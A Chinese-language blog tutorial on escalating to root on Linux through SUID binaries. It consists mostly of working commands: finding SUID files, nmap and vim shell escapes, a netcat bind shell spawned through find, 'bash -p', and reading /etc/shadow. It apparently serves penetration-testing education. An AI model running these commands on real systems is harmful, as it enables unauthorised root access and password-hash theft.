Linux下利用SUID提权

最新推荐文章于 2024-05-28 15:45:10 发布
最新推荐文章于 2024-05-28 15:45:10 发布
阅读量3k 收藏 19
点赞数 6

今天给大家带来的是linux下的提权技巧。SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

已知的可用来提权的linux可行性的文件列表如下:

Nmap
Vim
find
Bash
More
Less
Nano
cp

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

发现SUID可执行文件

以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含"s",并且对应的是root权限。

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

SUID可执行文件 - Nmap

NMAP

较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。

nmap -V

Nmap - 版本识别

交互模式可以通过执行Nmap参数"interactive"

nmap --interactive

Nmap - 交互模式

以下命令将提供一个提升的shell。

nmap> !sh
sh-3.2# whoami
root

提权至Root权限

也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。

exploit/unix/local/setuid_nmap


Find

如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。

touch pentestlab
find pentestlab -exec whoami \;

Find命令权限提升

大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

通过Find运行Netcat

连接上去就会直接获取到一个Root权限的shell。

netcat 192.168.1.189 5555
id
cat /etc/shadow

Root权限的shell

VIM

Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。

vim.tiny /etc/shadow

Vim - Shadow文件读取

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

Vim - Root权限


Bash

以下命令将以root权限打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)


‍Bash - Root权限

Less

Less和More都执行以用来提权。

less /etc/passwd
!/bin/sh

more /home/pelle/myfile
!/bin/bash


获取到Root权限

cp

使用cp覆盖 /etc/shadow

mv

使用mv 覆盖 /etc/shadow 或者/etc/sudoers

awk

awk 'BEGIN {system("/bin/bash")}'

man

man passwd
!/bin/bash

python/perl/ruby/lua/etc

  1. perl

    exec "/bin/bash";

  2. python

    import os
os.system("/bin/bash")


tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

参考资料

  • https://pentestlab.blog/2017/09/25/suid-executables/

  • http://blog.csdn.net/haofeifei6/article/details/11516753

  • https://evi1cg.me/archives/SUID_Privilege_Escalation.html

扫描下方二维码学习更多WEB安全知识:

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:www.ms08067.com

Ms08067安全实验室
关注
  • 6
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux下用SUID
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行...
Linux SUID
柠檬木有枝
01-27 4826
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 限位文件0x02 常用方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
简谈SUID
最新发布
2401_84466336的博客
05-28 988
SUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
linux——suid
tomyyyyy
04-14 357
linux——suid 基础知识 suid限介绍: SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承限。SUID被定义为给予一个用户临时的(程序/文件)所有者的限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的限...
Linux升—内核、SUID、脏牛等
剁椒鱼头没剁椒的博客
04-02 3109
关于Linux系统的前置知识其实和Windows系统是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。升的本质就是通过低限的账户转换为高限账户,通过获取高限账户去做想要做的事情。同时在内核的时候,需要注意有些内核漏洞需要使用到本地用户去,也就是非web限,但是有些漏洞可以无视限都可以进行,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
LinuxSUID
CP1024的博客
04-04 3809
LinuxSUID SUID 1. SUID限只能设置二进制文件 2. 命令执行者要有二进制文件的执行 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID限只在程序执行中有效 即如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限 cp命令 以cp为例,这里给cp添加SUID限做测试,拥有SUID限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
Linux使用suid vim.basic文件实现
09-14
总结来说,利用SUID的`vim.basic`实现,主要是通过修改`/etc/passwd`文件,添加一个具有root限的新用户。这种方式在安全环境中是不允许的,但在渗透测试或漏洞分析中,了解这种方法有助于升网络安全意识...
Linux扫描脚本
04-28
这篇文档将深入探讨Linux扫描的相关知识点,包括原理、常见方法、扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、原理 在Linux系统中,限分为三类:用户限、组限和所有者限。...
升-linux手法总结
01-14
### 升-linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux手法总结以及 Linuxexp集合
02-22
而"linuxexp大全.zip"则可能包含各种公开的exploit代码,供安全研究人员学习和测试系统防护措施。这些资源对于理解机制、高安全意识和进行安全测试非常有价值。 总的来说,理解并掌握Linux的...
Linux下非交互式详解
09-15
此外,利用SUID(Set-User-ID)或SGID(Set-Group-ID)限的程序也可能成为的途径。 在进行非交互式时,可能需要测试多种工具和方法,例如利用系统漏洞的exploit,或者利用已知的限滥用机制。通过将...
LinuxSUID
Zlirving_的博客
08-25 785
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的限,也就是root   0x01 suid 运行某些程序时暂时获得root的限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来的:(三种都可以) find / -perm -u=s -type f 2>/
Linux----SUID复现
qq_37451250的博客
12-03 1169
使用useradd命令,创建一个普通用户demo useradd -m demo == useradd 的-m选项是在/home目录下创建demo用户的家目录。 == 确认用户是否创建成功 cat /etc/passwd 在/etc/passwd文件末尾的第一个字段出现用户名demo,则创建用户成功。 ...
深度分析linuxSUID|Find|NMAP|VIM...
qq_60115503的博客
05-07 2815
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限,SGID与SUID相似,只是执行程序时获得的是文件属组的
SUID
一只web狗
07-01 1万+
SUID介绍
centos7输入shell找不到命令_安全研究 | CentOS 7系统利用suid获取Root Shell
weixin_42413377的博客
12-08 629
一、操作目的和应用场景本文档介绍在CentOS 7系统中利用带有suid限的程序从而获取root shell的方法。首先简单介绍suid的概念:Linux进程在运行的时候有以下三个UID:Real UID:执行该进程的用户的UID。Real UID只用于标识用户,不用于限检查。Effective UID(EUID):进程执行时生效的UID。在对访问目标进行操作时,系统会检查EUI...
文件特殊限(SUID,SGID,Sticky)
swthink的博客
12-06 417
三种特殊限:SUID,SGID,Sticky安全上下文,何为安全上下文安全上下是一个访问控制属性,是selinux中的重要组成部分,在进行移动时,不会改变文件的属性和限,而复制的过程会改变文件的属性,而安全上下文是一个访问的凭证,特定的文件被特定的程序访问,安全上下文会关闭系统认为不安全的功能,当安全上下文相匹配时才允许访问。前:进程有属主和属组;文件有属主和属组二进制的可执行文件上SUID限功能:任何一个可执行程序文件能不能启动为进程:取决发起者对程序文件是否拥有执行限启动为进程之后,其进程的属
Linux被曝出SUDO漏洞,幸好影响不大
NOSEC2019的博客
10-15 2403
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
Linux————利用SUID
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
linux suid
03-16
SUID是一种特殊的限位,当一个可执行文件被设置了SUID位后,它在执行时就会以文件所有者的限来执行,而不是以执行者的限来...为了防止SUID攻击,管理员应该定期检查系统中的SUID文件,并限制它们的使用限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值